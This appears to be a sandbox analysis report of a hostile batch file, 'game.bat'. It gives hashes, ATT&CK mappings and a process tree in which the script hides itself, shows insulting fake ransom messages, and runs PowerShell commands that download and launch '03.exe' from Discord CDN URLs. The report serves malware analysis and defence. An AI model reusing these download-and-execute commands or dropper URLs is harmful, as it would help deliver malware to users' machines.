08563fc77698091b0a2b3e342d2dc25d32a0d407e96e265c08291da456f49500

Analysis

max time kernel
139s
max time network
146s
platform
windows10-1703_x64
resource
win10-20230831-en
resource tags

arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system
submitted
03-10-2023 04:02

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

game.bat
Size

4KB
MD5

5c3319e045a738c49066e254cefa728e
SHA1

1963f565093619780748da2ef604c3d191029920
SHA256

08563fc77698091b0a2b3e342d2dc25d32a0d407e96e265c08291da456f49500
SHA512

8a8b6c2b9735296db4683cdace2740c902972aa927ad104c9f73510717b3e0fb890f486e8a48a9d77f069574b6953cfa624e18e5e4df0ca115c806d287f03a32
SSDEEP

96:YBlYcIcIcIcIcIcIckt4NzA3KhG9Hpzq2/8QRX:YfYcIcIcIcIcIcIcmmA3JJ7/8Ql

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1026368512589037568/1157889000858734703/Screenshot_20230929_022057_CapCut.jpg

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/1026368512589037568/1157889001072623657/Screenshot_20230929_043046_CapCut.jpg

Signatures

Blocklisted process makes network request 3 IoCs

flow	pid	Process
3	5076	powershell.exe
5	4720	powershell.exe
6	4160	powershell.exe

Downloads MZ/PE file

Executes dropped EXE 1 IoCs

pid	Process
3716	03.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	03.exe

Delays execution with timeout.exe 42 IoCs

evasion

pid	Process
4304	timeout.exe
3220	timeout.exe
2900	timeout.exe
2864	timeout.exe
5024	timeout.exe
4400	timeout.exe
4336	timeout.exe
4992	timeout.exe
4832	timeout.exe
3824	timeout.exe
3176	timeout.exe
820	timeout.exe
4392	timeout.exe
4376	timeout.exe
3480	timeout.exe
4976	timeout.exe
3412	timeout.exe
3348	timeout.exe
2516	timeout.exe
1052	timeout.exe
2952	timeout.exe
4920	timeout.exe
4764	timeout.exe
192	timeout.exe
3376	timeout.exe
4296	timeout.exe
2744	timeout.exe
984	timeout.exe
3484	timeout.exe
4016	timeout.exe
4300	timeout.exe
4548	timeout.exe
4960	timeout.exe
1384	timeout.exe
436	timeout.exe
4264	timeout.exe
4384	timeout.exe
224	timeout.exe
2988	timeout.exe
1056	timeout.exe
4244	timeout.exe
5100	timeout.exe

Suspicious behavior: EnumeratesProcesses 9 IoCs

pid	Process
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
4160	powershell.exe
4160	powershell.exe
4160	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	4160	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 868 wrote to memory of 2524	868	cmd.exe	71
PID 868 wrote to memory of 2524	868	cmd.exe	71
PID 868 wrote to memory of 1392	868	cmd.exe	72
PID 868 wrote to memory of 1392	868	cmd.exe	72
PID 868 wrote to memory of 1724	868	cmd.exe	73
PID 868 wrote to memory of 1724	868	cmd.exe	73
PID 868 wrote to memory of 3912	868	cmd.exe	74
PID 868 wrote to memory of 3912	868	cmd.exe	74
PID 868 wrote to memory of 3344	868	cmd.exe	75
PID 868 wrote to memory of 3344	868	cmd.exe	75
PID 868 wrote to memory of 4640	868	cmd.exe	76
PID 868 wrote to memory of 4640	868	cmd.exe	76
PID 868 wrote to memory of 2984	868	cmd.exe	77
PID 868 wrote to memory of 2984	868	cmd.exe	77
PID 868 wrote to memory of 204	868	cmd.exe	78
PID 868 wrote to memory of 204	868	cmd.exe	78
PID 868 wrote to memory of 3348	868	cmd.exe	79
PID 868 wrote to memory of 3348	868	cmd.exe	79
PID 868 wrote to memory of 4396	868	cmd.exe	80
PID 868 wrote to memory of 4396	868	cmd.exe	80
PID 868 wrote to memory of 2500	868	cmd.exe	81
PID 868 wrote to memory of 2500	868	cmd.exe	81
PID 868 wrote to memory of 2868	868	cmd.exe	82
PID 868 wrote to memory of 2868	868	cmd.exe	82
PID 868 wrote to memory of 2492	868	cmd.exe	83
PID 868 wrote to memory of 2492	868	cmd.exe	83
PID 868 wrote to memory of 5000	868	cmd.exe	84
PID 868 wrote to memory of 5000	868	cmd.exe	84
PID 868 wrote to memory of 5080	868	cmd.exe	85
PID 868 wrote to memory of 5080	868	cmd.exe	85
PID 868 wrote to memory of 808	868	cmd.exe	86
PID 868 wrote to memory of 808	868	cmd.exe	86
PID 868 wrote to memory of 756	868	cmd.exe	87
PID 868 wrote to memory of 756	868	cmd.exe	87
PID 868 wrote to memory of 4156	868	cmd.exe	88
PID 868 wrote to memory of 4156	868	cmd.exe	88
PID 868 wrote to memory of 4824	868	cmd.exe	89
PID 868 wrote to memory of 4824	868	cmd.exe	89
PID 868 wrote to memory of 384	868	cmd.exe	90
PID 868 wrote to memory of 384	868	cmd.exe	90
PID 868 wrote to memory of 1224	868	cmd.exe	91
PID 868 wrote to memory of 1224	868	cmd.exe	91
PID 868 wrote to memory of 4936	868	cmd.exe	92
PID 868 wrote to memory of 4936	868	cmd.exe	92
PID 868 wrote to memory of 4988	868	cmd.exe	93
PID 868 wrote to memory of 4988	868	cmd.exe	93
PID 868 wrote to memory of 2408	868	cmd.exe	94
PID 868 wrote to memory of 2408	868	cmd.exe	94
PID 868 wrote to memory of 2412	868	cmd.exe	95
PID 868 wrote to memory of 2412	868	cmd.exe	95
PID 868 wrote to memory of 4644	868	cmd.exe	96
PID 868 wrote to memory of 4644	868	cmd.exe	96
PID 868 wrote to memory of 3300	868	cmd.exe	97
PID 868 wrote to memory of 3300	868	cmd.exe	97
PID 868 wrote to memory of 4468	868	cmd.exe	98
PID 868 wrote to memory of 4468	868	cmd.exe	98
PID 868 wrote to memory of 1788	868	cmd.exe	99
PID 868 wrote to memory of 1788	868	cmd.exe	99
PID 868 wrote to memory of 420	868	cmd.exe	100
PID 868 wrote to memory of 420	868	cmd.exe	100
PID 868 wrote to memory of 3216	868	cmd.exe	101
PID 868 wrote to memory of 3216	868	cmd.exe	101
PID 868 wrote to memory of 1428	868	cmd.exe	102
PID 868 wrote to memory of 1428	868	cmd.exe	102

Views/modifies file attributes 1 TTPs 3 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2524	attrib.exe
1628	attrib.exe
4780	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\game.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:868
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\Users\Admin\AppData\Local\Temp\game.bat"
  2⤵
  - Views/modifies file attributes
  PID:2524
- C:\Windows\system32\msg.exe
  msg * If you are seeing this message.
  2⤵
  PID:1392
- C:\Windows\system32\msg.exe
  msg * Your files are gone
  2⤵
  PID:1724
- C:\Windows\system32\msg.exe
  msg * If u closed the ransom window....
  2⤵
  PID:3912
- C:\Windows\system32\msg.exe
  msg * Don't worry, just rerun the file.
  2⤵
  PID:3344
- C:\Windows\system32\msg.exe
  msg * Why did we target you?
  2⤵
  PID:4640
- C:\Windows\system32\msg.exe
  msg * Because you're a retard
  2⤵
  PID:2984
- C:\Windows\system32\msg.exe
  msg * If you are seeing this message.
  2⤵
  PID:204
- C:\Windows\system32\msg.exe
  msg * Your files are gone
  2⤵
  PID:3348
- C:\Windows\system32\msg.exe
  msg * If u closed the ransom window....
  2⤵
  PID:4396
- C:\Windows\system32\msg.exe
  msg * Don't worry, just rerun the file.
  2⤵
  PID:2500
- C:\Windows\system32\msg.exe
  msg * Why did we target you?
  2⤵
  PID:2868
- C:\Windows\system32\msg.exe
  msg * Because you're a retard
  2⤵
  PID:2492
- C:\Windows\system32\msg.exe
  msg * If you are seeing this message.
  2⤵
  PID:5000
- C:\Windows\system32\msg.exe
  msg * Your files are gone
  2⤵
  PID:5080
- C:\Windows\system32\msg.exe
  msg * If u closed the ransom window....
  2⤵
  PID:808
- C:\Windows\system32\msg.exe
  msg * Don't worry, just rerun the file.
  2⤵
  PID:756
- C:\Windows\system32\msg.exe
  msg * Why did we target you?
  2⤵
  PID:4156
- C:\Windows\system32\msg.exe
  msg * Because you're a retard
  2⤵
  PID:4824
- C:\Windows\system32\msg.exe
  msg * If you are seeing this message.
  2⤵
  PID:384
- C:\Windows\system32\msg.exe
  msg * Your files are gone
  2⤵
  PID:1224
- C:\Windows\system32\msg.exe
  msg * If u closed the ransom window....
  2⤵
  PID:4936
- C:\Windows\system32\msg.exe
  msg * Don't worry, just rerun the file.
  2⤵
  PID:4988
- C:\Windows\system32\msg.exe
  msg * Why did we target you?
  2⤵
  PID:2408
- C:\Windows\system32\msg.exe
  msg * Because you're a retard
  2⤵
  PID:2412
- C:\Windows\system32\msg.exe
  msg * If you are seeing this message.
  2⤵
  PID:4644
- C:\Windows\system32\msg.exe
  msg * Your files are gone
  2⤵
  PID:3300
- C:\Windows\system32\msg.exe
  msg * If u closed the ransom window....
  2⤵
  PID:4468
- C:\Windows\system32\msg.exe
  msg * Don't worry, just rerun the file.
  2⤵
  PID:1788
- C:\Windows\system32\msg.exe
  msg * Why did we target you?
  2⤵
  PID:420
- C:\Windows\system32\msg.exe
  msg * Because you're a retard
  2⤵
  PID:3216
- C:\Windows\system32\msg.exe
  msg * If you are seeing this message.
  2⤵
  PID:1428
- C:\Windows\system32\msg.exe
  msg * Your files are gone
  2⤵
  PID:4956
- C:\Windows\system32\msg.exe
  msg * If u closed the ransom window....
  2⤵
  PID:4996
- C:\Windows\system32\msg.exe
  msg * Don't worry, just rerun the file.
  2⤵
  PID:4268
- C:\Windows\system32\msg.exe
  msg * Why did we target you?
  2⤵
  PID:220
- C:\Windows\system32\msg.exe
  msg * Because you're a retard
  2⤵
  PID:3372
- C:\Windows\system32\msg.exe
  msg * If you are seeing this message.
  2⤵
  PID:1696
- C:\Windows\system32\msg.exe
  msg * Your files are gone
  2⤵
  PID:4672
- C:\Windows\system32\msg.exe
  msg * If u closed the ransom window....
  2⤵
  PID:4768
- C:\Windows\system32\msg.exe
  msg * Don't worry, just rerun the file.
  2⤵
  PID:2584
- C:\Windows\system32\msg.exe
  msg * Why did we target you?
  2⤵
  PID:1152
- C:\Windows\system32\msg.exe
  msg * Because you're a retard
  2⤵
  PID:4820
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "& { Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1026368512589037568/1158269735813787719/03.exe?ex=651ba240&is=651a50c0&hm=0e3f834fbc18ed356fd3f439574877694502bc99a7c3a6681c8776a04e2493bc&' -OutFile '03.exe' }"
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5076
- C:\Windows\system32\attrib.exe
  attrib +h +s "C:\Users\Admin\Desktop\river123308\03.exe"
  2⤵
  - Views/modifies file attributes
  PID:1628
- C:\Users\Admin\Desktop\river123308\03.exe
  "C:\Users\Admin\Desktop\river123308\03.exe"
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:3716
- - C:\Windows\SYSTEM32\cmd.exe
    cmd /c "03.bat"
    3⤵
    PID:1356
  - - C:\Windows\system32\mode.com
      mode con cols=800 lines=100
      4⤵
      PID:3692
  - - C:\Windows\system32\attrib.exe
      attrib +h 03.bat
      4⤵
      Views/modifies file attributes
      PID:4780
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1026368512589037568/1157889000858734703/Screenshot_20230929_022057_CapCut.jpg', 'C:\Users\Admin\Desktop\river_1_23465\image1.jpg')"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4720
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1026368512589037568/1157889001072623657/Screenshot_20230929_043046_CapCut.jpg', 'C:\Users\Admin\Desktop\river_1_23465\image2.jpg')"
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4160
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4304
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4016
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3176
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:820
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4400
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4392
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:192
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3220
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3412
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4960
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2988
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2900
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1384
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4300
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3348
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2516
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2864
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1052
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4336
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:436
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3376
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2952
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4548
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4264
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4384
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4376
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4920
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:1056
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4244
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4992
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3480
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4296
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:2744
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4832
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5024
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:984
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4976
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3484
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:3824
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:224
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:5100
  - - C:\Windows\system32\timeout.exe
      timeout /t 1 /nobreak
      4⤵
      Delays execution with timeout.exe
      PID:4764

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
56efdb5a0f10b5eece165de4f8c9d799

SHA1
fa5de7ca343b018c3bfeab692545eb544c244e16

SHA256
6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

SHA512
91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
2e609483f91eb5037b5a3e92607babfb

SHA1
1178921b83a84fb7eed8f21d4aff7d4fd7ec9e90

SHA256
b985da596c4badd6b350d18425aee393519b52d5861044bb1f8e3231dcf16f87

SHA512
b34e12a95633aba42a4fd39522d8c8f1f996a364a7f98e9561174c38e3fe7219bb8d822a4e81c218146a6bf0deaafd390948f82d5b17188b526a51c942c7ab8e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
013487015ecadccec6db14b6f61967ad

SHA1
f421d32a7b14952c83bfe7f3092f68f4375ff751

SHA256
26f7b5d3abe411a5cc9bee9ce985c5327fb5fb05c6988daad5a57a78d3b11d08

SHA512
29371f45ffe06d14bbd0509e945c025ed8017afd6ce2d676a9935d1ef554d5cc4b23601f529604e3009ec6762436f3ca99be2552c33e0a73617ae7164465ba35

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\03.bat

Filesize
2KB

MD5
ad7e88cb5e612652308e70809e7d16ba

SHA1
b02d121baacbaa906abc59c8e797b561215dffc2

SHA256
a156c3c9fc4f27f7da0bc4297d889857bdce113c24d0d97da9feb220e8070a5a

SHA512
48f99777d73a3e3f2d1abbd0eabcbbd4571f25d2481ab8d8cc1344a19ff056124c2ad1552780020f8e09de8e8899f62f337a2fdce974965e81a552d13509877e

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fnki0uxl.yfu.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\Desktop\river123308\03.exe

Filesize
89KB

MD5
93517bf36d934421684bc905fd11f2cc

SHA1
ed85b482344aae8e4d20cd092f94928ac1fa240e

SHA256
706fccec06bb21fad9e59cc474966ca85aa29c8795f9ffed8024223d839e34e3

SHA512
6056521c24b5cfb10507f07fc076760754de3f335efb57402df3bf0e35a0d71f50beb8e2502305f2bad8c6c6f42f8cc70cdb02fd204ece52030c691d9e2b4d4c

Download Submit
C:\Users\Admin\Desktop\river123308\03.exe

Filesize
89KB

MD5
93517bf36d934421684bc905fd11f2cc

SHA1
ed85b482344aae8e4d20cd092f94928ac1fa240e

SHA256
706fccec06bb21fad9e59cc474966ca85aa29c8795f9ffed8024223d839e34e3

SHA512
6056521c24b5cfb10507f07fc076760754de3f335efb57402df3bf0e35a0d71f50beb8e2502305f2bad8c6c6f42f8cc70cdb02fd204ece52030c691d9e2b4d4c

Download Submit
memory/4160-97-0x00007FFC025A0000-0x00007FFC02F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4160-93-0x0000027F70060000-0x0000027F70070000-memory.dmp

Filesize
64KB

Download
memory/4160-75-0x0000027F70060000-0x0000027F70070000-memory.dmp

Filesize
64KB

Download
memory/4160-74-0x0000027F70060000-0x0000027F70070000-memory.dmp

Filesize
64KB

Download
memory/4160-72-0x00007FFC025A0000-0x00007FFC02F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4720-43-0x00007FFC025A0000-0x00007FFC02F8C000-memory.dmp

Filesize
9.9MB

Download
memory/4720-44-0x00000202E4760000-0x00000202E4770000-memory.dmp

Filesize
64KB

Download
memory/4720-46-0x00000202E4760000-0x00000202E4770000-memory.dmp

Filesize
64KB

Download
memory/4720-64-0x00000202E4760000-0x00000202E4770000-memory.dmp

Filesize
64KB

Download
memory/4720-68-0x00007FFC025A0000-0x00007FFC02F8C000-memory.dmp

Filesize
9.9MB

Download
memory/5076-4-0x0000023F69660000-0x0000023F69682000-memory.dmp

Filesize
136KB

Download
memory/5076-33-0x00007FFC025A0000-0x00007FFC02F8C000-memory.dmp

Filesize
9.9MB

Download
memory/5076-25-0x0000023F69620000-0x0000023F69630000-memory.dmp

Filesize
64KB

Download
memory/5076-10-0x0000023F69810000-0x0000023F69886000-memory.dmp

Filesize
472KB

Download
memory/5076-7-0x0000023F69620000-0x0000023F69630000-memory.dmp

Filesize
64KB

Download
memory/5076-6-0x0000023F69620000-0x0000023F69630000-memory.dmp

Filesize
64KB

Download
memory/5076-5-0x00007FFC025A0000-0x00007FFC02F8C000-memory.dmp

Filesize
9.9MB

Download